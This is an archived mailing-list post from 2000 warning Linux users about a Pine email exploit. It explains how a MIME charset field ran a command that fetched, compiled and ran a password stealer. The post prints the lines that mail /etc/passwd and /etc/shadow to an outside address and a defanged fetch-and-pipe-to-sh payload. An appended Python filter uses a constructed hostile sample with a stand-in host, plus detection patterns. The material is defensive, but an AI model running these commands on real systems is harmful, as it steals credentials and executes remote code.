Complete.Org: Mailing Lists: Archives: discussion: May 2000:
[aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file
To: <discussion@xxxxxxxxx>
Subject: [aclug-L] FW: URGENT!!!!!!! Pine hacking attack: DOS attack, log file attached!(fwd)
From: "Dale W Hodge" <dwh@xxxxxxxxxxxxxxxx>
Date: Thu, 18 May 2000 13:45:18 -0500
Reply-to: discussion@xxxxxxxxx

Here's the first of the messages about the Pine Exploit.

-----Original Message-----
From: owner-linux-admin@xxxxxxxxxxxxxxxx
[mailto:owner-linux-admin@xxxxxxxxxxxxxxxx] On Behalf Of Jim Roland
Sent: Tuesday, May 16, 2000 2:49 AM
To: linux-net@xxxxxxxxxxxxxxxx; linux-admin@xxxxxxxxxxxxxxxx;
linux-newbie@xxxxxxxxxxxxxxxx
Subject: URGENT!!!!!!! Pine hacking attack: DOS attack, log file
attached!(fwd)


(I've BCC'd several people I personally know that could find this
information useful).

I'm sure some of you might have been hit with something like this, but
this is the first time in my 3 years of using Pine that Pine has been
used to attempt to hack into my system.  This is a little too scary, and a
little too close to similar attacks against Microsoft email software.

For everyone's sake, I hope it was just me that was attacked, but it
appears that the person who sent out the message used to attack put
addresses in the BCC field, which probably spammed several people.  If you
receive a message with "DOS attack, log file attached!" and you're on Unix
or Linux, DO NOT, I REPEAT, DO NOT OPEN the message.  I'm not speaking
like the media press that says "do not open the message" when they really
mean to say "do not open the attachment"; this type of attack literally
uses *nix systems (Linux, etc.) to start running a program while a message
is being looked over for attachments via Pine.  If you open the message to
view the headers or body, IT'S TOO LATE!

Like a good admin, I thought this was a real message, and wanted to find
out what was going on.  I was too tired to be suspicious that the From and
To addresses never contained anything from my domain name.  Unfortunately,
Pine does not show the "To" address, and thinking it was sent to my "root"
or one of the "*master" accounts (which is why the "+" does not show up in
front of the message--I have admin accounts forwarded to my user-level
account), I opened it.

---------------------------

For those of you who are experienced, please do not get frustrated; I want
to make this serve as a warning to newbies about properly using Linux and
unknowingly sending out their passwords to a 3rd party.  Therefore, my
explanations in here might be a little less advanced, but I do not want
anyone to get nailed like I did.  The message quoted below was used to
attempt to steal passwords from my system.  Yes, that's right, the message
below (changed to make it harmless while you read this warning) was used
to attempt to steal passwords from my system from inside Pine.

Please forgive this message if it appears to be a little off-topic and a
little panicked; I want to save someone from being hacked into like I ALMOST
was (they would have gotten the "keys" to my system if I hadn't used some
common sense and the command line (tools like kill, killall, ps, and so
on)).  Newbies:  Sometimes, there is NO substitute for the command line.
GUI tools are great for learning about the system, but some things you
need the command line for.  Please do not hesitate to use this listserv as
a help resource.

Let me preface this first (especially for you new to linux), with
the phrase that all linux books and installation manuals tell you:
NEVER, NEVER, NEVER use your admin account (root) to do ANY user functions
on the system, including reading mail.  Newbies:  Don't be scared by this,
Linux is a great system, and actually is more secure and (at the moment),
immune to most viruses like the ILOVEYOU that floated around.

Fortunately for me, I actually go by this rule.  Folks new to Linux might
not necessarily follow that rule to the letter.  Please, do listen, there
is credence to why you're told to do that.

Now for the meaty stuff.

Like any good admin, when the system is installed, not only are you
prompted (or required) to password your "root" account (which has rights
to everything on the system), but you are prompted to create a user-level
account as well.  ALWAYS use this user-level account to do everything on
the system, including reading email.

Those who think Pine is immune to being attacked or being used to attack
are gravely mistaken.  (Pine is a command-line email program that can't
be used to run things like .vbs files, or other document viruses.)

I had a rude awakening this evening just before turning in for the night.
I was just going to peek at my mail account to clean out any topics from
the listservs that didn't interest me, when I came across the message
quoted below.  (DOS=Denial of Service).  It indicated that my system had
been used to launch a denial of service attack.  Of course it was false;
however, it took forever to open the message, and I eventually had to
log in from another telnet session as root to kill pine, and other
programs that made the drive go nuts.

I became instinctively suspicious when a 12k message, which should take
1-2 seconds to open, was taking a lot longer to open.

Apparently, what was going on behind the scenes was very sinister.

I could never open the message body, nor the attached file, so I saved
the message to a mail folder (typically in the mail
directory) that I created like "temp".  Exiting Pine, I did a "cd mail"
where my Pine mail folders are kept (each folder is one message appended
to another in a standard text file).  I did a "less" on the mail folder and
discovered what actually occurred:

1) Masquerading as an attachment (this apparently only works with
pine--Microsoft mail programs would be immune to this and would see
gibberish (MIME encoded b.s.) and a log file showing IP addresses that are
not even part of their (or my) network), the MIME field called "charset"
was used to launch an attack against the system.

2) The attack was simply to launch a text-based web browser (lynx), pull
down the source code of a C++ program called "io" that froze my system
(actually slowed it down).

3) The program (io) is downloaded, stored in /tmp/io, compiled,
and run.  All of this happens in the background, hiding the compiler (gcc)
and the pipes to the shell (sh or bash) from the ps command.  I did manage
to kill the parent process (sh) and killed the attempt, but mail logs show
it was too late (fortunately he did not get much from my system but
"permission denied" messages).

4) The "io" program's purpose was to email my /etc/passwd and
/etc/shadow files to an email account (bjern3@xxxxxxxxxxxxx), along with
my hostname, IP address, etc.

** Step #4 is where the golden rule (Never use "root" to do ANY user
functions), comes into play.

----------------------

Had I been logged into my system as root, this cracker would have been
able to steal my passwords file (shadow).  A properly configured
/etc/shadow file should only have rights to be read by root ("ls -la
/etc/shadow" gives this output):
-rw-------   1 root     root         3929 Apr 23 14:06 /etc/shadow

This means that no other user accounts on a system can read this file
directly.  Newer Linux Distributions put their passwords in /etc/shadow.
Older Linux Distributions put passwords in /etc/passwd, which can be read
(maybe not written) by any id on the system.

The attack I received emails both files to that attglobal.net mail
account.  The best this guy gets is a list of a couple of accounts on a
system, most of which are already disabled anyway.  All he got was my IP
address, user id numbers, and a "permission denied" instead of my
/etc/shadow file.


I managed to (from looking at the raw text of the mail message from
outside of Pine), locate exactly where this program comes from.  It was
read by Lynx, piped to sh (which compiled and ran the program) then
exited, never showing the mail message.

I've already notified attglobal.net, tofan.onza.net's ISP, and the relay
host that was used to send this message out (from the Netherlands).  If
you're attacked, contact these folks as well.  Shut this idiot down.
Hopefully it's someone in the US, so that the FBI can nail them.

The sources:

attglobal.net   =       mail account that receives the passwords, and IPs
fontijne.nl     =       source of the message relayed to and spoofing the
                                onza.net domain.  Likely the source of
                                useractive's hijacking, if they were
                                hijacked.  Microsoft Exchange used to
                                send the message out.
tofan.onza.net  =       a system hosting the source code of the password
                                stealing program.
useractive.net  =       either ISP knowingly hosting the onza.net attack
                                source code, or was hijacked by someone
savvis.net      =       useractive's upstream provider (useractive's ISP)
wcom.net        =       A dialup pool on Worldcom's Chicago POP that was
                                used to spam via a Netherlands mail server
                                (IP and host can be seen in the mail
                                 header below)

Both the "onza" and "useractive" systems are in Champaign, IL


I've notified attglobal.net's abuse center, called useractive and
savvis.net (I'm suspicious of useractive, but called them anyway), and
was thinking of calling the FBI's computer crimes division.

------------------------------------

The program's source code (for security reasons, and so that I don't send
it to a potential cracker, I will only post the lines that do the actual
stealing...I have no idea (yet) what the rest of the program does):

mail -s hhp-pine000 bjern3@xxxxxxxxxxxxx 2>/dev/null < /etc/passwd
echo "`hostname -i` - `id` - `cat /etc/shadow 2>&1`" | mail -s hhp-pine bjern3@xxxxxxxxxxxxx 2>/dev/null


------------------------------------

As you can see, he's creative, but did not cover his tracks very well.
The initial message was bounced off of a mail server in The
Netherlands, from a Chicago dialup account on MCI/Worldcom.


I apologize for the length, but I wanted to make sure I warned those on
the "newbie" list who might not realize what's going on, especially those
with DSL or Cable modems that might have a static IP address and leave
their system on all the time.



Lastly, below is the evil mail message.  I've snipped out the MIME encoded
data, which doesn't appear to be a real attachment; however, the "evil" is
contained in a [disabled] "charset=" field.  I changed the pipe symbols to
an underscore (_) so that they will not harm your system.

The file actually contains 2 attachments as far as Pine is concerned.  The
2nd does the damage, the 1st is to provide a "front" if it's a
non-Pine mail client.  The "front" contains a log snippet, maybe real,
maybe not. To prevent this message from being longer than necessary, I
will not include it, just the MIME headers to filter out (maybe with
procmail, or sendmail)--look for "charset" as noted below with the hash
(#) in front, and filter out the content of that field, so your mail users
do not get hit with this attack.  The "attached log file" is merely a list
of ip-deny messages via syslog.  The IPs in the log appear to be fake or
dial-up IPs.

Good luck.
JR


---------- Forwarded message ----------
Return-Path: <root@xxxxxxxxxxxxxx>
Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
        by (host removed) with ESMTP id RAA24494
        for (address removed); Mon, 15 May 2000 17:01:11 -0500
Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
    mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
    Version 5.5.2650.21) id K69W8L9Q; Tue, 16 May 2000 00:01:02 +0200
Received: from chi-qbu-nva-vty3.as.wcom.net ([216.192.161.3]) by
    Bastion.Fontijne.nl; Mon, 15 May 2000 23:54:04 +0000 (GMT)
Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@xxxxxxxxxxxxxx>
Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
From: root <root@xxxxxxxxxxxxxx>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
To: root@xxxxxxxxxxxxxx

THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL 
FROM YOUR DOMAIN.
AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.

Jerry Leininser
cops@xxxxxxxxxxxxxx

---2463811839-1047689522-958180505=:1450
Content-Type: APPLICATION/octet-stream; name="log.txt.tofan.onza.net.exit"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.1000512211505.1450B@xxxxxxxxxxxxxx>
Content-Description:

[MIME data snipped out]


[MIME header for attachment #2, the MIME header and "charset" field have
been disabled; Pipe symbols (|) that launch the damage have been changed
to underscore symbols (_) to avoid any damage to your system]

#---1463811839-1047689522-958180505=:1450
#Content-Type: TEXT/PLAIN;
#charset=
#charset's contents: "lynx${IFS}-source${IFS}tofan.onza.net_sh_exit"

#name="log" name="emailf" Content-Transfer-Encoding: BASE64
#Content-Description: THE LOGS
#Content-Disposition: attachment; filename="emailf"








PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
WE HAVE FACED A KERNEL PANIC!

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55 .S....
Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55 .S....
Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55 .S....
Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55 .S....
Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55 .S....
Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55 .S....
Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1389 \
              206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371 \
              206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1412 \
              206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55 .S....
Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1423 \
              206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55 .S....


We hope you will take appropriate actions!


[Added]
------------end of 2nd attachment----------------


Good luck in filtering this out!





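The filter the author asks for above (look at the "charset" field and drop messages whose value is shell input rather than a charset name) can be written against the MIME structure instead of by grepping raw text, so that folded header lines and quoted parameter values are handled the same way a mail client handles them.  The following is an added example and is not code from the original mail or from Pine.  It assumes two constructed messages: a hostile one modeled on the headers quoted above, with a placeholder host name (evil.example) and with the pipe symbols the author replaced by underscores restored, and a benign one with an ordinary charset and attachment name.  The charset allowlist is the example's own choice.  The reason the attacker wrote `${IFS}` rather than a space is that a MIME parameter value cannot contain a literal space without quoting, while `sh` expands `${IFS}` to its field separator, so a single token becomes the three-word command "lynx -source <url>" once it reaches a shell; the example flags that trick explicitly and, independently, any other shell metacharacter and any charset that does not look like a charset.

```python
"""Added example (not from the original mail): a procmail-style check done
with Python's email parser, so folded headers and quoted values are read the
way a mail client reads them instead of by grepping raw text."""
import email
import re

# What a real charset name looks like (us-ascii, ISO-8859-1, UTF-8, koi8-r,
# ISO_8859-1:1987).  This allowlist is the example's own choice; it is tighter
# than the RFC 2045 token grammar, which still admits $ { } and | in a value.
SAFE_CHARSET = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:-]{0,39}$")

# ${IFS} (or $IFS) puts whitespace into a value that may not contain a literal
# space: sh expands it to its field separator, turning one token into a command.
IFS_TRICK = re.compile(r"\$\{?IFS\}?")

# Characters with meaning to sh; none belong in a charset, boundary, name or
# filename that a mail client might pass to an external program.
SHELL_META = re.compile(r"[|;&`$<>\n]")

PARAM_HEADERS = ("Content-Type", "Content-Disposition")


def classify(name, value):
    """Return why a parameter value is suspicious, or None if it is not."""
    if IFS_TRICK.search(value):
        return "uses ${IFS} to smuggle whitespace into a single token"
    if SHELL_META.search(value):
        return "contains shell metacharacters"
    if name.lower() == "charset" and not SAFE_CHARSET.match(value):
        return "charset is not a plausible charset name"
    return None


def scan_message(raw):
    """Walk every MIME part and report suspicious parameter values."""
    msg = email.message_from_string(raw)
    findings = []
    for index, part in enumerate(msg.walk()):
        for header in PARAM_HEADERS:
            params = part.get_params(header=header, unquote=True) or []
            # The first entry is the main value, e.g. ('text/plain', '');
            # the name=value pairs after it are the parameters.
            for name, value in params[1:]:
                if isinstance(value, tuple):      # RFC 2231 encoded parameter
                    value = value[2]
                reason = classify(name, value)
                if reason:
                    findings.append({"part": index, "header": header,
                                     "param": name, "value": value,
                                     "reason": reason})
    return findings


def verdict(raw):
    """What a delivery-time filter would do with the message."""
    return "quarantine" if scan_message(raw) else "deliver"


# Constructed sample modeled on the headers quoted in the mail above.  The host
# name is a placeholder, and the pipes the author replaced with underscores are
# restored, since they are what the filter has to catch.
HOSTILE = """\
From: root <root@victim.example>
To: root@victim.example
Subject: DOS attack, log file attached!
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="example-boundary-1450"

--example-boundary-1450
Content-Type: APPLICATION/octet-stream; name="log.txt"

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 203.0.113.7:1371

--example-boundary-1450
Content-Type: TEXT/PLAIN;
    charset=lynx${IFS}-source${IFS}evil.example|sh|exit
Content-Description: THE LOGS
Content-Disposition: attachment; filename="emailf"

We hope you will take appropriate actions!

--example-boundary-1450--
"""

# Constructed benign message: a real charset and an ordinary attachment name.
BENIGN = """\
From: alice@victim.example
To: bob@victim.example
Subject: firewall log excerpt
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; name="log.txt"
Content-Disposition: attachment; filename="log.txt"

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 203.0.113.7:1371
"""

if __name__ == "__main__":
    for label, raw in (("hostile", HOSTILE), ("benign", BENIGN)):
        print(label, "->", verdict(raw))
        for hit in scan_message(raw):
            print("  part %(part)d %(header)s %(param)s=%(value)r: %(reason)s" % hit)
```

Run it as a script and the hostile sample is quarantined on the charset parameter of its second part while the benign one is delivered.  Checking every parameter of Content-Type and Content-Disposition, not just charset, is deliberate: the author's point is that a header field reached a shell, and the same bug pattern applies to any parameter a client hands to an external program.  Blocking only the string `${IFS}` would be easy to evade, which is why the charset allowlist is the check that actually carries the weight.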